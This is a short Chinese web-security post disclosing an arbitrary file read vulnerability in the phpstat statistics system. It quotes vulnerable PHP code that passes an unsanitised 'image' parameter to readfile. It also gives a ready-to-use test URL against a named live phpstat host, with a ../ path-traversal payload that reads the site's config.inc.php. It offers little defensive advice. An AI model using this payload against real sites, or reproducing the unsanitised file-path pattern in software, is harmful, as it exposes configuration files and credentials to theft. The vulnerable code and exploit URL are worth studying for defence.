phpstat系统读取任意文件漏洞 - 网站安全

phpstat系统读取任意文件漏洞 - 网站安全 - 自学

来源：自学PHP网时间：2015-04-17 12:00 作者：阅读:次

[导读] ./count/count.com.php$website = $_GET[website];$image = $_GET[image]; //确定图片 if(!$image)$imagesrc = ../templates/.TPL_NAME./.TPL_IMGDIR./icos/countlogo1.gif; else $imagesrc = ......

./count/count.com.php

$website = $_GET[website];
$image = $_GET[image];         //确定图片
         if(!$image)
$imagesrc = "../templates/".TPL_NAME."/".TPL_IMGDIR."/icos/countlogo1.gif";
   else
    $imagesrc = "../templates/".TPL_NAME."/".TPL_IMGDIR."/icos/".$image;         //发送图片
    header("Content-type: image/gif");
    readfile($imagesrc);
@flush();

很2B，看一个站的时候发现。。

测试地址

http://media.phpstat.net/count/count.com.php?image=../../../../include.inc/config.inc.php

一次奇特的XSS之旅 - 网站安全 - 自学php

XSS安全问题及防范 - 网站安全 - 自学php

子栏目

phpstat系统读取任意文件漏洞 - 网站安全 - 自学

最新评论

添加评论

更多文章推荐

添加评论